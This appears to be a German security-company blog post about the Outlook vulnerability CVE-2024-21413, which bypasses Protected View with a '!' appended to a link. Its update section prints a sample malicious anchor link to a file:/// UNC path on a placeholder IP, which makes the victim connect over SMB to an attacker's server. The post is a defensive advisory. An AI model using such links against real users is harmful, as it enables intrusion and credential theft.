Am 14.02.2024 wurde von Microsoft eine kritische Sicherheitsschwachstelle in Outlook bekannt gegeben, die es Angreifern auf einfachste Art per hinzufügen eines „!“ ermöglicht, Sicherheitsvorkehrungen zu umgehen . Diese Schwachstelle CVE-2024-21413 hat eine hohe Schwere mit einem CVSS v3-Basiswert von 9,8, was darauf hinweist, dass sie Angreifern ermöglicht, Code aus der Ferne auszuführen, ohne dass Benutzerinteraktion erforderlich ist. Die Schwachstelle wird durch die Sicherheitsminderung der Vorschaufensterfunktion in Microsoft Office ausgenutzt. Speziell ermöglicht sie es einem Angreifer, die Geschützte Ansicht von Office zu umgehen, wodurch ein Dokument im Bearbeitungsmodus anstatt im geschützten Modus geöffnet wird.
Diese Schwachstelle gehört zu mehreren von Microsoft in einem signifikanten Sicherheitsupdate gepatchten Schwachstellen, das insgesamt 72 Schwachstellen im Windows-Ökosystem adressierte. Sie wurde aufgrund ihrer Ausnutzung in aktiven Malware-Angriffen neben zwei weiteren kritischen Schwachstellen in Windows hervorgehoben. Die Ausnutzung dieser Schwachstellen könnte zu einer Reihe von Sicherheitsbedrohungen führen, einschließlich Remote-Codeausführung, Umgehung von Sicherheitsfunktionen, Offenlegung von Informationen und Eskalation von Privilegien. Microsoft hat Benutzer und Administratoren dringend dazu aufgefordert, die Sicherheitsupdates umgehend anzuwenden, um sich gegen potenzielle Ausnutzungen zu schützen und vor Phishing- und Spoofing-Angriffen, die die Sicherheitsvorkehrungen des Betriebssystems umgehen könnten, auf der Hut zu sein.
Was ist CVE-2024-21413?
Warum ist es kritisch?
Was können Sie tun?
Update vom 19.2.24: Microsoft warnt vor Ausnutzung
Mittlerweile sind Proof of Concept Exploits bekannt geworden und Microsoft hat diesbezüglich eine Sicherheitswarnung herausgegeben, die zum unverzüglichen Update ermahnt.
Denn Angreifer können ganz einfach über folgende 3 Schritte die Sicherheitsbarrieren von Outlook umgehen:
- User zum Link Klick auffordern, der einen link vom Typ <a href=“file:///\\10.10.11.11\test\test.rtf!…“>CLICK ME</a> beinhaltet und wegen ! nicht erkannt wird
- Dadurch wird eine SMB Verbindung zu einem Server des Angreifers hergestellt
- über diese kann der Angreifer das Windows Component Object Model (COM) ausnutzen und sich so Zugriff auf den Client Rechner verschaffen
Professionelle Hilfe erwünscht?
Sentiguard ist spezialisiert auf Notfallhilfe nach Cyberattacken, IT Sicherheitsbeauftragte und IT Sicherheitskonzepte nach BSI Standard. Haben Sie Fragen und wünschen Sie unverbindliche Beratung, dann melden Sie sich gerne bei uns: